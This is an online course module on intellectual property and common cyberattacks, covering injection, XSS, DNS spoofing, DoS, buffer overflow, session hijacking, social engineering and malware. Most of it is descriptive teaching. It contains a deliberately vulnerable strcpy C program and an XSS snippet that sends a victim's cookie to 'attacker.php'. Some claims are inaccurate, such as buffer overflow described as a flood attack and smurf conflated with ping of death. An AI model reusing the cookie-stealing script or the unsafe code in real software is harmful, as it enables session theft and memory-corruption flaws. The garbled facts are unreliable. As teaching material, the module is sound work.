The words you are searching are inside this book. To get more targeted content, please make full-text search by clicking here.
Discover the best professional documents and content resources in AnyFlip Document Base.
Search
Published by Enhelion, 2021-11-09 00:17:08

Module_4

Module_4

MODULE 3

IP THEFT AND TYPES OF ATTACKS

3.1. WHAT IS IP?

IP stands for Intellectual Property. Intellectual property (IP) refers to creations
of the mind, such as inventions literary and artistic works, designs, and
symbols, names and images used for business to generate profits.

3.2. TYPES OF INTELLECTUAL PROPERTY?

• Patents:

A patent is an exclusive right granted for an invention. A patent provides
the patent owner with the right to decide how or if their invention can be
used by others. In exchange for this exclusivity, the patent owner makes
technical information about the invention publicly available in the
published patent document.

• Trade Marks:

A trademark is a sign capable of distinguishing the goods or services of
one enterprise from those of other enterprises. Trademarks originated in

ancient times when artisans used to put their signature or "mark" on their
products.

• Designs:

An industrial design composes the ornamental or aesthetic aspect of an
article. A design may consist of two-dimensional features, such as
patterns, lines or color, or three-dimensional features, such as the shape
or surface of an article.

• Copyrights:

Copyright is a legal term used to describe the rights that creators have
over their literary and artistic works. Books, music, paintings, sculpture
and films, to computer programs, databases, advertisements, maps and
technical drawings are all covered by copyright

• Trade Secrets

A trade secret is a type of intellectual property in the form of a formula,
practice, process, design, instrument, pattern, commercial method, or
compilation of information not generally known or reasonably
discoverable by others, by which a business can obtain an economic
advantage over competitors or customers.

3.3. WHAT CAN BE STOLEN AS IP?

• Idea/ Inventions/ Creative Expression
• Products
• Designs
• Product Specification
• Process Information and Methodologies
• Manufacturing Process
• Business Method

3.4. TYPES OF ATTACK?

Here we are discussing 2 types of attacks which are:

1. Web Based Attack.
2. System Based Attack.

3.5. WHAT IS WEB BASED ATTACKS?

Web based attacks are considered to be the greatest and often the least
understood of all risks related to confidentiality, availability, and integrity. The
aim of a web-based attack is significantly different than other attacks. A
network or host is the target of attack in most traditional penetration testing
exercises. Web based attacks are centered around an application itself and
functions on layer 7 of the OSI. John Pescatore of the Gartner group claims
that nearly 70% of all attacks occur at the application layer.

Application vulnerabilities could provide the manner in which malicious end
users breach a system's protection mechanisms usually to take advantage or
gain access to private information or system resources. Information gathered
could include social security numbers, dates of birth, and maiden names, which
are all often used in identity theft. Another popular target for attackers is credit
card data. Left unprotected and unencrypted, they can be used to cause
significant damage to organizations most valued assets, their customers. So
what makes up an application attack? By definition, all web application attacks
are comprised of at least one normal request or a modified request aimed at
taking advantage of poor parameter checking or instruction spoofing.

There are six fundamental categories of application attacks.

• Spoofing:
Spoofing is the act of imitating another user or process to perform a task
or retrieve information that would normally not be allowed. An attacker
could use a crafted HTTP request containing the session id information
from another user and retrieve the targeted users account information.

• Repudiation:
Applications must have reasonable repudiation controls such as web
access, authentication, and database transaction logs in order to tie
specific actions of a single user. Without confirming logs, online web
application users could easily claim that they did not transfer equities
from one account to an external account of another. Otherwise without
proof otherwise all online brokerages would be required to reimburse the

client for lost funds. Collecting and correlating logs from multiple
sources (web application, middleware, and database) can prevent
repudiation attacks.
• Information Disclosure:
Information disclosure is one of the biggest threats to large organizations
who maintain private information about their customer base. When
attackers can reveal private information about a user or users of a web
site, consumer confidence in that organization can take drastic hits
causing loss in sales, stock price, and overall marketability. Applications
must require adequate controls which will prevent user ID and session
manipulation to prevent this
• Denial of Service:
Denial of service attacks are one of the most widely-known of all
application attacks. They are often generated by malicious users,
competitors or script kiddies. Motivations for this type of an attack range
from personal to political reasons in hopes of stifling an organization’s
ability to field online business.
• Elevation of Privileges:
Authorization controls which are both reliable and staunch are
requirements for any system or application which guards sensitive
information. This requires a malicious user to either already possess or
gain through unlawful methods authorization privileges of a regular user.
Once the malicious user is logged into the victim system, an attempt will
be made by exploitation of an application through poor parameter
checking or instruction spoofing.

3.6. TYPES OF WEB BASED ATTACKS

3.6.1. Injection Attack

Injection attacks refer to a comprehensive class of attack vectors that allow an
attacker to supply untrusted input to a program, which gets processed by an
interpreter as part of a command or query which alters the course of
execution of that program. They are amongst the oldest and most dangerous
web application attacks. They can result in data theft, loss of data integrity,
data loss, denial of service, as well as full system compromise.

Injection is a major problem in web security. Injection attacks, particularly
SQL injection (SQLi), are very dangerous.

3.6.1.1. Types of Injection Attacks
1. SQL injection (SQLi)
2. Cross-site Scripting (XSS)
3. Code injection
4. CRLF injection
5. Email (Mail command/SMTP) injection
6. Host Header injection
7. LDAP injection
8. OS Command injection
9. XPath injection

3.6.2. File Inclusion

A file inclusion vulnerability allows an attacker to access unauthorized or
sensitive files available on the web server or to execute malicious files on the
web server by making use of the ‘include’ functionality. This vulnerability is
mainly due to a bad input validation mechanism, wherein the user’s input is
passed to the file include commands without proper validation.

There are 2 types of file inclusion.

1. Remote File Inclusion.
2. Local File Inclusion.
3.6.2.1. Remote File Inclusion

Remote file inclusion allows an attacker to include and execute a remotely
hosted file using a script by including it in the attack page. The attacker can
use RFI to run a malicious code either on the server or on the client side. The
impact of this attack can vary from temporary theft of stealing session tokens
or data when the target is client, to complete system compromise when the
target is the application server.

3.6.2.2. Local File Inclusion

The local file inclusion vulnerability is a process of including the local files
available on the server. This vulnerability occurs when a user input contains
the path to the file that has to be included. When such an input is not properly

cleared, the attacker may give some default file names and access unauthorized
files. An attacker may also make use of directory traversal characters and
retrieve sensitive files available in other directories.

3.6.3. Cross-Site Scripting

Cross site scripting (XSS) is a common attack vector that injects malicious
code into a vulnerable web application. XSS differs from other web attack
vectors such as SQL injections as it does not directly target the application
itself. The users of the web application are the ones at risk to this type of attack.

Cross site scripting attacks can be of two types: stored and reflected.

• Stored XSS occurs when a malicious script is injected directly into
a vulnerable web application. It also known as persistent XSS and
is the more damaging of the two.

• Reflected XSS involves the reflecting of a malicious script off of
a web application, onto a user’s browser. The script is embedded
into a link, and is only activated once that link is clicked on.

3.6.4. DNS Spoofing Attack

DNS spoofing occurs when a particular DNS server’s records of “spoofed” or
altered maliciously to redirect traffic to the attacker. This diversion of traffic
allows the attacker to steal data, spread malware, etc. For example, if a DNS
record is spoofed, then the attacker can manage to divert all the traffic that

relied on the correct DNS record to visit a fake website that the attacker has
created to resemble the real site or a different site completely.

3.6.4.1. How does a DNS Spoofing work?

DNS spoofing can be carried out using various methods such as:

• DNS cache poisoning
• Compromising a DNS server
• Implementing a Man in the Middle Attack

However, an attacker’s end goal is usually the same no matter which method
they use. Either they want to steal information, re-route you to a website that
benefits them, or spread malware. The most analyzed method to perform DNS
spoofing is using cache poisoning.

3.6.4.2. DNS Cache Poisoning

Since DNS servers cache the DNS translation for faster, more efficient
browsing, attackers can take advantage of this to perform DNS spoofing. If an
attacker is able to inject a forged DNS entry into the DNS server, all users will
now be using that forged DNS entry until the cache expires. Once the cache
expires, the DNS entry will return to normal as the DNS server will go through
the complete DNS lookup process again. However, if the DNS server’s
software still hasn’t been updated, then the attacker can duplicate this error and
continue siphoning visitors to their website.

DNS cache poisoning can sometimes be quite difficult to notice. If the
malicious website is very similar to the website it is trying to impersonate,
some users may not even notice the difference. Additionally, if the attacker is
using DNS cache poisoning to compromise one company’s DNS records in
order to have access to their emails for example, then this may also be difficult
to detect.

3.6.5. Denial of Service (DoS) & (DDoS):

A Denial-of-Service (DoS) attack is an attack meant to shut down a machine
or network, making it inaccessible to its intended users. DoS attacks
accomplish this by flooding the target with traffic, or sending it information
that triggers a crash.

Victims of DoS attacks often target web servers of high-profile organizations
such as banking, commerce, and media companies, or government and trade
organizations. While DoS attacks do not normally result in the theft or loss of
significant information or other assets, they can cost the victim a great deal of
time and money to handle.

There are two general methods of DoS attacks:

• flooding services
• crashing services

Flood attacks occur when the system receives too much traffic for the server
to buffer, causing them to slow down and eventually stop.

Popular flood attacks include:

• Buffer overflow attacks – the most common DoS attack. It is
based on the concept to send more traffic to a network address than
the programmers have built the system to handle. It includes the
attacks listed below, in addition to others that are designed to
exploit bugs distinct to certain applications or networks

• ICMP flood – This attack takes advantage of misconfigured
network devices by sending spoofed packets that ping every
computer on the targeted network, instead of just one specific
machine. The network is then triggered to amplify the traffic. It is
also known as the ping of death or smurf attack.

• SYN flood – sends a request to connect to a server, but never
completes it. It continues until all open ports are saturated with
requests and none are available for legitimate users to connect to.

3.6.5.1. What is DDOS Attack?

A distributed denial-of-service (DDoS) attack is an attack in which several
compromised computer systems attack a target, such as a server, website or
other network resource, and cause a denial of service for users of the targeted
resource. The bombardment of incoming messages, connection requests or

malformed packets to the target system forces it to slow down or even crash
and shut down, thereby denying service to legitimate users or systems.

In a typical DDoS attack, the assailant begins by exploiting a vulnerability in
one computer system and making it the DDoS master. The attack master
system identifies other vulnerable systems and, by either infecting the systems
with malware or through bypassing the authentication controls, gains control
over them.

A networked device or a computer under the control of an intruder is known
as a zombie, or bot. The attacker creates what is called a command-and-control
server to command the network of bots, also called a botnet. The person in
control of a botnet can be sometimes referred to as the botmaster. Historically,
this term has been used to refer to the first system "acquired” into a botnet
because it is used to control the spread and activity of other systems in the
botnet.

Botnets can be comprised of almost any number of bots; botnets with tens or
hundreds of thousands of nodes have become increasingly common, and there
may not be an upper limit to their size. Once the botnet is assembled, the
attacker can use the traffic generated by the compromised devices to flood the
target domain and knock it offline.

3.6.6. Dictionary Attack

The dictionary attack uses a simple file containing words that can be found in
a dictionary, hence its rather straightforward name. In other words, this attack
uses exactly the kind of words that many people use as their password.

3.6.7. Brute Force Attack

The brute force attack is similar to the dictionary attack but comes with an
added bonus for the hacker. Instead of just using words, a brute force attack
lets them detect non-dictionary words by working through all possible alpha-
numeric combinations from aaa1 to zzz10.

It’s not quick, provided your password is over a handful of characters long, but
it will eventually uncover your password. Brute force attacks can be shortened
by throwing additional computing horsepower, in terms of both processing
power – including harnessing the power of your video card GPU

3.6.8. Buffer Overflow Attack

A buffer is a temporary area for data storage. When more data gets placed by
a program or system process, the extra data overflows. It causes some of that
data to leak out into other buffers, which can corrupt or overwrite whatever
data they were holding.

In a buffer-overflow attack, the extra data sometimes holds specific
instructions for actions planned by a hacker or malicious user. For instance, the

data could trigger a response that damages files, changes data or unveils private
information.

Attackers would use a buffer-overflow exploit to take advantage of a program
that is waiting on a user’s input.

There are two types of buffer overflows:

• stack-based
• heap-based

Heap-based, which are difficult to execute and the least common of the two,
attack an application by flooding the memory space reserved for a program.
Stack-based buffer overflows, which are more common among attackers,
exploit applications and programs by using what is known as a stack: memory
space used to store user input.

Let us study some real program examples that show the danger of such
situations based on the C.

// A C program to demonstrate buffer overflow

#include <stdio.h>

#include <string.h>

#include <stdlib.h>

int main(int argc, char *argv[])
{

// Reserve 5 byte of buffer plus the terminating NULL.
// should allocate 8 bytes = 2 double words,
// To overflow, need more than 8 bytes...
char buffer[5]; // If more than 8 characters input

// by user, there will be access
// violation, segmentation fault

// a prompt how to execute the program...
if (argc < 2)
{

printf("strcpy() NOT executed....\n");
printf("Syntax: %s <characters>\n", argv[0]);
exit(0);
}

// copy the user input to mybuffer, without any
// bound checking a secure version is srtcpy_s()
strcpy(buffer, argv[1]);
printf("buffer content= %s\n", buffer);

// you may want to try strcpy_s()
printf("strcpy() executed...\n");

return 0;

}

Compile this program in Linux and for output use command
outpute_file INPUT

Input : 12345678 (8 bytes), the program run smoothly.

Input : 123456789 (9 bytes)

"Segmentation fault" message will be displayed and the program terminates.

The vulnerability exists because the buffer could be overflowed if the user
input (argv[1]) bigger than 8 bytes. Why 8 bytes? For 32 bit (4 bytes) system,
we must fill up a double word (32 bits) memory. Character (char) size is 1 byte,
so if we request buffer with 5 bytes, the system will allocate 2 double words (8
bytes). That is why when you input more than 8 bytes; the mybuffer will be
over flowed

Similar standard functions that are technically less vulnerable, such as
strncpy(), strncat(), and memcpy(), do exist. However, the problem with these
functions is that the programmer is responsible to assert the size of the buffer,
not the compiler.

Every programmer must be familiar with the buffer overflow problem before
they start coding. A lot of bugs generated, in most cases can be exploited as a
result of buffer overflow.

3.6.9. Session Hijacking

Computer session in normal day-to-day speak is a temporary interaction you
have with a website. For example, A session is the time between you first log
into your bank account and then log off after your operation.

3.6.9.1. What is Session Hijacking?

TCP session hijacking is a security attack on a user session over a protected
network. The most common method of session hijacking is called IP spoofing.
It occurs when an attacker uses source-routed IP packets to insert commands
into an active communication between two nodes on a network while
disguising itself as one of the authenticated users. This type of attack is possible
because authentication typically is only done at the beginning of a TCP session.

Another type of session hijacking is known as a man-in-the-middle attack.
Using a sniffer, the attacker can observe the communication between devices
and collect the data that is transmitted.

The session token could be compromised in multiple ways. The most common
are:

• Predictable session token;

• Session Sniffing;
• Client-side attacks (XSS, malicious JavaScript Codes, Trojans,

etc);
• Man-in-the-middle attack
• Man-in-the-browser attack
• Using Packet Sniffers

Using Packet Sniffers

In the above figure, it can be seen that attack captures the victim’s session ID
to gain access to the server by using some packet sniffers.

Cross Site Scripting (XSS Attack)

Attackers can also capture victim’s Session ID using XSS attack by using
JavaScript. An attacker sends a crafted link to the victim with the
malicious JavaScript. When the victim clicks on the link, the JavaScript
will run and complete the instructions devised by the attacker.

<SCRIPT type="text/javascript">

var adr = '../attacker.php?victim_cookie=' +
escape(document.cookie);

</SCRIPT>

IP Spoofing

Spoofing is pretending to be someone else. This is a technique used to gain
prohibited access to the computer with an IP address of a trusted host. In
implementing this technique, attacker has to obtain the IP address of the client
and inject his own packets spoofed with the IP address of client into the TCP
session, so as to trick the server that it is communicating with the victim i.e.
the original host.

Blind Attack

If an attacker is not able to sniff packets and guess the correct sequence number
expected by server, brute force combinations of sequence number can be tried.

Mitigation

To defend a network with session hijacking, a defender has to implement both
security measures at Application level and Network level. Network level
hijacks can be prevented by ciphering the packets so that the hijacker cannot
decipher the packet headers to obtain any information which will help in
spoofing. This encryption can be provided by using protocols such as IPSEC,
SSL, SSH etc. Internet security protocol (IPSEC) has the means to encrypt the
packet on some shared key between the two parties involved in
communication. IPsec runs in two modes: Transport and Tunnel.
In Transport Mode only the data sent in the packet is encrypted while in Tunnel
Mode both packet headers and data are encrypted, so it is more restrictive.

Session hijacking is a grave threat to networks and web applications as most
of the systems are vulnerable to it.

3.6.10. Social Engineering Attack

Social Engineering is a one type of attack vector or intension to get the
information about victim by manipulating peoples.

3.6.10.1.What is Social Engineering?

Social engineering is the term used for a wide scope of malicious activities
accomplished through human interactions. It uses psychological manipulation

to con users into making security mistakes or giving away sensitive
information.

Social engineering attacks happen in one or more steps. A perpetrator first
researches the intended victim to gather necessary background information,
such as potential points of entry and weak security protocols, needed to
proceed with the attack. Then, the attacker moves to gain the victim’s trust and
provide circumstances for subsequent actions that break security practices,
such as revealing sensitive information or granting access to critical resources.

3.6.10.2.Social Engineering Life Cycle

What makes social engineering especially dangerous is that it relies on human
error, rather than vulnerabilities in software and operating systems. Mistakes
made by legitimate users are much less predictable, making them harder to
identify and thwart than a malware-based intrusion.

3.6.10.3.Social engineering attack techniques

Social engineering attacks come in various forms and can be performed
anywhere where human interaction is involved. The following are the five most
common forms of digital social engineering assaults:

3.6.10.4. Baiting

As its name implies, baiting attacks use a false promise to provoke a victim’s
greed or curiosity. They lure users into a trap that steals their personal
information or inflicts their systems with malware.

The most condemned form of baiting uses physical media to disperse malware.
For instance, attackers leave the bait—typically malware-infected flash
drives—in conspicuous areas where potential victims are certain to see them
such as bathrooms, elevators, the parking lot of a targeted company. The bait
has an authentic look to it, such as a label presenting it as the company’s payroll
list. Victims pick up the bait out of curiosity and insert it into a work or home
computer, resulting in automatic installation of malware in the system.

Baiting scams don’t necessarily have to be carried out in the physical world.
Online, baiting consists of attractive advertisements that lead to malicious sites
or that encourage users to download a malware-infected application.

3.6.10.5. Scareware

Scareware involves victims being swamped with false alarms and fictitious
threats. Users are tricked into thinking their system is infected with malware,
prompting them to install software that has no real benefit (other than for the
perpetrator) or is malware itself. Scareware is also referred to as deception
software, rogue scanner software and fraudware.

A common scareware example is the legitimate-looking popup banners
appearing in your browser while surfing the web, displaying such text such as,
“Your computer may be infected with harmful spyware programs.” It either
offers to install the tool (often malware-infected) for you, or will direct you to
a malicious site where your computer becomes infected.

Scareware is also distributed via spam email that doles out bogus warnings, or
makes offers for users to buy worthless/harmful services.

3.6.10.6. Pretexting

Here, attackers obtain information through a series of cleverly crafted lies. The
scam is often commenced by a perpetrator pretending to need sensitive
information from a victim to perform a dire task.

The attacker usually starts by establishing trust with their victim by
impersonating co-workers, police, bank and tax officials, or other persons who
have right-to-know authority. The pre-texter asks questions that are ostensibly
required to confirm the victim’s identity, through which they gather important
personal data.

All sorts of pertinent information and records is gathered using this scam, such
as social security numbers, personal addresses and phone numbers, phone
records, staff vacation dates, bank records and even security information
related to a physical plant.

3.6.10.7. Phishing

As one of the most popular social engineering attack types, phishing scams are
email and text message campaigns aimed at creating a sense of urgency,
curiosity or fear in victims. It then urges them into revealing sensitive
information, clicking on links to malicious websites, or opening attachments
that contain malware.

For example, an email sent to users of an online service that alerts them of a
policy violation requiring immediate action on their part, such as a required
password change. It includes a link to an illegitimate website—nearly identical
in appearance to its legitimate version— encouraging the oblivious user to
enter their current credentials and new password. Upon form submittal the
information is sent to the attacker.

Given that identical, or near-identical, messages are sent to all users in phishing
campaigns, detecting and blocking them are much easier for mail servers
having access to threat sharing platforms.

3.6.10.8.Spear phishing

This is a more targeted version of the phishing scam whereby an attacker
chooses specific individuals or enterprises. They then customize their
messages based on characteristics, job positions, and contacts belonging to
their victims to make their attack less detectable. Spear phishing requires much
more effort on behalf of the perpetrator and may take weeks and months to pull
off. They’re much harder to detect and have better success rates if done
skillfully.

A spear phishing scenario might involve an attacker who, in impersonating an
organization’s IT consultant, sends an email to one or more employees. It’s
worded and signed exactly as the consultant normally does, thereby deceiving
recipients into thinking it’s an authentic message. The message prompts
recipients to change their password and provides them with a link that redirects
them to a malicious page where the attacker now captures their credentials.

3.7. SYSTEM BASED ATTACKS

Viruses, worms, Trojans, and bots are all part of a class of software called
"malware." Malware is short for "malicious software," also known
as malicious code or "malcode." It is software or code that is specifically

produced to damage, disrupt, steal, or in general inflict some other illegitimate
action on data, hosts, or networks.

There are many different classes of malware that have varying ways of
infecting systems and propagating themselves. Malware can infect systems by
being packaged with other programs or attached as macros to files. Others are
installed by exploiting a known vulnerability in an operating system (OS),
network device, or other software. However, the clear majority are installed
due to some action from the user, such as clicking an email attachment or
downloading a file from the Internet.

Damage from malware varies from causing minor irritation (such as browser
popup ads), to destroying data, stealing confidential information or money, and
compromising or entirely immobilizing systems and networks.

3.7.1. Classes of Malicious Software

Viruses and Worms are the two most common types of malware. These types
of programs are able to clone themselves and can spread copies of themselves,
which may even be modified copies.

These and other classes of malicious software are described below:

3.7.1.1. Ransomware

Ransomware is a type of malicious software that threatens to publish the
victim's data or perpetually block access to it unless a ransom is paid. Some

simple ransomwares may lock the system in a way that is not difficult for a
knowledgeable person to reverse. More advanced malware use a technique
called cryptoviral extortion, which encrypts the victim's files, making them
inaccessible, and demands a ransom payment to decrypt them.

3.7.1.2. Viruses

A computer virus is a type of malware that generates by inserting a copy of
itself into and becoming part of another program. It spreads infections as it
travels from one computer to another. Viruses can range in severity from
causing mildly annoying effects to damaging data or software and causing
denial-of-service (DoS) conditions. Almost all viruses are attached to
an executable file. This means the virus may exist on a system but will not be
active or able to spread until the user runs or opens the malicious host file or
program. When the host code is executed, the viral code is executed as well.
Usually, the host program keeps functioning after it is infected by the virus.
However, some viruses overwrite other programs with clones of themselves,
which decimate the host program altogether. When the software or document
they are attached to is transferred from one computer to another using the
network, file sharing, a disk, or infected email attachments, viruses are spread.

3.7.1.3. Worms

Computer worms are similar to viruses in that they replicate functional copies
of themselves and can cause the same type of damage. While viruses require
the spreading of an infected host file, worms are standalone software and do

not require a host program or human help to spread. Worms either exploit a
vulnerability on the target system or use some kind of social engineering to
fool users into executing them. A worm enters a computer through a
vulnerability in the system and takes advantage of file-transport or
information-transport features on the system, allowing it to travel
independently. More advanced worms use encryption, wipers, and ransomware
technologies to harm their targets.

3.7.1.4. Trojans

A Trojan is another type of malware named after the historic wooden horse
that the Greeks used to infiltrate Troy. It is a damaging piece of software that
looks legitimate. Users are typically deceived into loading and executing it on
their systems. After activation, it can fulfill any number of attacks on the host,
from infuriating the user (popping up windows or changing desktops) to
damaging the host (deleting files, stealing data, or activating and spreading
other malware, such as viruses). Trojans are also known to create backdoors to
give malicious users access to the system. Trojans do not reproduce by
infecting other files nor do they self-replicate like viruses and worms. They
must spread through user interaction such as opening an email attachment or
downloading and running a file from the Internet.

3.7.1.5. Bots

"Bot" is derived from the word "robot". It is an automated process that interacts
with other network services. Bots often automate tasks and provide

information or services easily that would or else be conducted by a human
being. A typical use of bots is to gather information, such as web crawlers, or
interact automatically with Instant Messaging (IM), Internet Relay Chat (IRC),
or other web interfaces. They may also be used to interact dynamically with
websites.

Bots can be used for good or malicious purposes. A malicious bot is self-
propagating malware designed to infect a host and connect back to a central
server or servers that act as a command and control (C&C) center for an entire
network of compromised devices.This network is also called the botnet. With
a botnet, attackers can launch a wide remote-controlled flood-type attacks
against their targets.

Along with the ability to self-propagate like worms, bots can include the ability
to log keystrokes, capture and analyze packets, gather passwords, gather
financial information, launch Denial of Service (DOS) Attacks, relay spam,
and open backdoors on the infected host. Bots have all the benefits of worms
but are generally much more adaptable in their infection vector and are often
modified within hours of publication of a new exploit. They have been known
to exploit backdoors opened by worms and viruses, which allows them to
access networks that have good perimeter control. Bots rarely notify their
presence with high scan rates that damage network infrastructure.
Alternatively, they infect networks in a way that escapes immediate notice.

Advanced botnets may take advantage of common internet of things (IOT)
devices such as home electronics or appliances to increase automated
attacks. Crypto mining is a common use of these bots for nefarious purposes.

3.7.1.6. Adware

Software that generates revenue for its developer by automatically generating
online advertisements in the user interface of the software or on a screen
presented to the user during the installation process. The software may generate
two types of revenue: one is for the display of the advertisement and another
on a "pay-per-click" basis if the user clicks on the advertisement.

3.1.7.7. Backdoor

An undocumented way of accessing a system, bypassing the normal
authentication mechanisms. Some backdoors are placed in the software by the
original programmer. Others are placed on systems through a system
compromise, such as a virus or worm. Usually, attackers use backdoors for
easier and continued access to a system after it has been compromised.

3.1.7.8. Bootkit

A malware variant that modifies the boot sectors of a hard drive, including the
Master Boot Record (MBR) and Volume Boot Record (VBR). Attackers may
use bootkits to linger on systems at a layer below the operating system, which

may make it difficult to perform full restoration unless an organization suspects
one was used and can act accordingly.

References

• Sans Institute InfoSec Reading Room: Web based attacks
https://www.sans.org/reading-
room/whitepapers/application/paper/2053

• What is DNS Spoofing?
https://www.keycdn.com/support/dns-spoofing

• File Inclusion Attacks- Aerosol
https://rstforums.com/forum/topic/86844-file-inclusion-attacks/

• File Inclusion Attacks-Infosec Institute
https://resources.infosecinstitute.com/file-inclusion-attacks/

• What makes a distributed Denial of service attack “Distributed”? -
Brainly
https://brainly.com/question/11028042

• Can you write a piece of code that is susceptible to be hacked and then
demonstrate how a hacker would hack it?
https://www.quora.com/Can-you-write-a-piece-of-code-that-is-
susceptible-to-be-hacked-and-then-demonstrate-how-a-hacker-would-
hack-it

• Java security Misc
https://massivetechinterview.blogspot.com/2015/09/java-security-
misc.html

• What is Social Engineering- Imperva
https://www.imperva.com/learn/application-security/social-
engineering-attack/

• What Is the Difference: Viruses, Worms, Trojans, and Bots? – Cisco
https://www.cisco.com/c/en/us/about/security-center/virus-
differences.html

• What is trojan and backdoor?
https://www.quora.com/What-is-trojan-and-backdoor

• Malware: Viruses in Attachments in Emails- What you need to know
https://www.consumerfraudreporting.org/malware/MalwareInEmails.p
hp


Click to View FlipBook Version